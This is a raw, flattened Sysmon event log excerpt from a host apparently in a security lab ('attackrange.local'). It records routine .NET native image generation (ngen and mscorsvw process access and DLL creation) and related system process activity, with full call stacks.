13:48:37.732{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.716{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:37.716{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:37.466{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:37.450{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:37.450{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91B5-6005-0203-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:37.247{59A5CD1D-91B1-6005-0103-00000000A301}4664C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1238-0\System.Xml.dll2021-01-18 13:48:37.247 10341000x80000000000000007235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:42.794{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:42.778{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:42.778{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000007232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:42.559{59A5CD1D-91B5-6005-0303-00000000A301}4536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11b8-0\System.Core.dll2021-01-18 13:48:42.559 10341000x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:43.528{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.513{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:43.513{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:43.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:43.356{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:43.356{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BB-6005-0503-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:43.278{59A5CD1D-91BA-6005-0403-00000000A301}4140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\102c-0\System.Configuration.dll2021-01-18 13:48:43.278 10341000x80000000000000007262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.888{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.872{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.872{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
